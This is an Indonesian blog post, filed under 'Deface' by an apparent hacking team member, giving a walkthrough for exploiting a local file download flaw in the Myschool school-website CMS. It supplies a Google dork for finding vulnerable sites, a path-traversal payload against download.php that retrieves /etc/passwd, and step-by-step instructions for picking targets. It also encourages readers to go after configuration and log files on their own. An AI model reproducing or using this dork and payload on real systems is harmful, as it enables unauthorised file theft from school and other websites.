You are here
Home > Deface

Myschool CMS LFD Vulnerability

Myschool CMS LFD Vulnerability

CMS Myschool adalah sebuah konten manajemen yang dibuat oleh anekaweb menggunakan php dan mysql, yang ditujukan untuk situs – situs sekolah. Walaupun tidak semua situs sekolah menggunakannya dan tidak semua penggunanya adalah situs sekolah. :v Selain membuat cms myschool, banyak cms lain yang telah dibuat oleh anekaweb. Tapi ga penting sih, disini kan kita cuma mau bahas lfd pada cms myschool. Nah, buat yang blom tau lfd itu apa kalian bisa baca artikel Local file download vulnerability.

Sebelum saya membuat write up disini, saya pernah mempublikasikan celah ini di cxsecurity saat saya masih berada di Error Violence. Tapi apalah error violence, itu cuma saya greet karena team aja.

Dalam kerentanan LFD ini, yang saya contohkan adalah mengambi file /etc/passwd dari server menggunakan celah Local file download pada user. Nah, untuk penggunaan lain seperti mencari konfigurasi access logs dan sebagainya silahkan cari sendiri dirnya 😀

Dork: inurl:/img_anekaweb/
Exploit: /webconfig/download.php?file=../../../../../../../../../../etc/passwd

Gatau apa itu dork? Baca artikel Google hacking gan.

1.Dorking menggunakan tadi di google images
Myschool CMS LFD Vulnerability

2.Salin url gambar, dan ambil alamat websitenya aja
Myschool CMS LFD Vulnerability

3.Masukan exploit diatas yang kurang lebih akan menjadi seperti dibawah, lalu saat dibuka akan terdownload sebuah file. Yap, itulah kerentanan LFD
Myschool CMS LFD Vulnerability

0N3R1D3R
Founder Indonesia To World Team
https://www.indonesiatoworld.org

Berlangganan via email

Ketik email:


Tinggalkan Balasan

Top